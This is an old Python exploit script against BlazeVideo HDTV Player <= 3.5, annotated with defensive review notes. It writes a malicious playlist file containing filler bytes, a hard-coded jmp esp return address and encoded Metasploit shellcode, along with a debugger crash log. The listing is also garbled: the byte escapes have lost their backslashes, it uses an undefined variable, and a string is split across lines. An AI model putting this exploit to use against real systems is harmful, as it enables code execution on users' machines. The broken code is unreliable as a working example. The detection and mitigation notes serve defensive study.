
blazehdtv-hof.txt

Posted on 03 February 2009

#!/usr/bin/python
#
# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Heap Overflow Exploit
#
# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV
# Player software, combining HDTV playback, FM receiving, video record and DVD playback
# functions. You can take advantage of PC monitor's high resolution, watch, record, playback
# high definition HDTV program or teletext broadcast program.
#
# Product web page: http://www.blazevideo.com/hdtv-player/index.htm
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# ------------------------------------windbg------------------------------------
#
# (620.d74): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001
# eip=43434343 esp=0013f288 ebp=6405247c iopl=0 nv up ei pl nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# 43434343 ?? ???
#
#--------------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# http://www.zeroscience.org/
#
# 03.01.2009
#
# ---------------------------------- review notes ----------------------------------
#
# What the script does: it prints a banner, concatenates a filler string, a 4-byte
# address, padding and an encoded payload, and writes the result to a local file
# named "Groundhog_Day.plf". It performs no network activity; the word "Remote" in
# the title presumably refers to delivering the file to a victim who then opens it
# in the player (user interaction required) - confirm against the advisory.
#
# Reading the debugger excerpt: eip holds 43434343, a repeated byte pattern rather
# than a code address, and the fault is an access violation. That is consistent
# with bytes from the playlist file overwriting a control-flow target in the player.
#
# NOTE(review): the title says "heap overflow", but the layout used below (fixed
# length filler followed by an address annotated "jmp esp") is the shape usually
# associated with a saved-return-address overwrite. Treat the bug class as
# unconfirmed when triaging.
#
# NOTE(review): the listing as captured on this page is not runnable as-is; it is
# kept here as a record of the advisory.
#
# Defensive takeaways:
#  - Affected: BlazeVideo HDTV Player <= 3.5 per the title; only Windows XP SP2
#    (English) is listed as tested. No fixed version is named on this page.
#  - The return address is hard-coded to a location inside user32.dll, so the
#    technique depends on that module loading at a fixed address and on the stack
#    being executable; ASLR and DEP both undermine those assumptions.
#  - Detection ideas: .plf files containing a single entry hundreds of bytes long,
#    long runs of one repeated byte followed by runs of 0x90, the file name
#    "Groundhog_Day.plf", and the player process spawning a child process.
#  - Mitigation: remove or update the player, and do not leave .plf associated
#    with it on hosts that open files from untrusted sources.
#
# -----------------------------------------------------------------------------------

# Banner only; no effect on the generated file.
print "--------------------------------------------------------------------------"
print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit "
print " by LiquidWorm [liquidworm[t00t]gmail.com] - 2009 "
print "--------------------------------------------------------------------------"

# Filler intended to reach the overwritten control-flow target (260 repetitions).
buffer = "x41" * 260

# Hard-coded address; the author's comment says it points at a `jmp esp` in user32.dll.
# Presumably specific to the tested OS build and language - confirm before relying on it
# as a signature.
eip = "xc0x25x49x7e" #jmp esp user32.dll

# Padding of 15 repeated bytes placed before and after the payload.
nop = "x90" * 15

# Per the generator comment below, this is a Metasploit "win32_exec" payload of 328 bytes,
# Alpha2-encoded, whose command is `sol` (presumably the Windows Solitaire binary, i.e. a
# harmless proof-of-execution) and which exits via thread termination.
# win32_exec - EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax48x6ax65"
"x58x30x42x31x50x42x41x6bx41x41x75x32x41x42x32x42"
"x41x30x42x41x41x58x38x41x42x50x75x39x79x6bx4cx4a"
"x48x47x34x43x30x45x50x57x70x4cx4bx71x55x77x4cx4c"
"x4bx71x6cx37x75x30x78x75x51x78x6fx4cx4bx52x6fx32"
"x38x4cx4bx63x6fx45x70x55x51x5ax4bx31x59x6cx4bx44"
"x74x6cx4bx55x51x4ax4ex76x51x49x50x6dx49x4cx6cx4e"
"x64x6fx30x30x74x43x37x7ax61x59x5ax36x6dx46x61x6a"
"x62x58x6bx7ax54x45x6bx76x34x47x54x64x44x53x45x79"
"x75x4cx4bx63x6fx51x34x67x71x4ax4bx50x66x4cx4bx76"
"x6cx30x4bx4cx4bx43x6fx67x6cx34x41x58x6bx6ex6bx75"
"x4cx6cx4bx37x71x38x6bx6cx49x63x6cx54x64x44x44x79"
"x53x50x31x69x50x63x54x4cx4bx63x70x34x70x4bx35x4f"
"x30x53x48x56x6cx6ex6bx71x50x76x6cx4cx4bx34x30x45"
"x4cx4cx6dx4ex6bx50x68x55x58x5ax4bx54x49x4cx4bx6f"
"x70x4ex50x55x50x63x30x75x50x4cx4bx72x48x55x6cx71"
"x4fx45x61x39x66x41x70x72x76x4fx79x6bx48x4dx53x4f"
"x30x73x4bx50x50x50x68x6ax4fx48x4ex6dx30x43x50x62"
"x48x6fx68x4bx4ex4fx7ax74x4ex46x37x39x6fx69x77x41"
"x63x50x6fx70x6cx75x50x65"
)

# File content: filler, address, padding, payload, padding - in that order.
payload = garbage + eip + nop + shellcode + nop

# Writes the playlist file into the current working directory, then waits for Enter.
# The bare `except` reports every failure as "Oops!" with no detail.
try:
    out_file = open("Groundhog_Day.plf",'w')
    out_file.write(payload)
    out_file.close()
    raw_input(" [*] Evil playlist successfully created. 
Press any key to continue...")
except:
    print "Oops!"

 

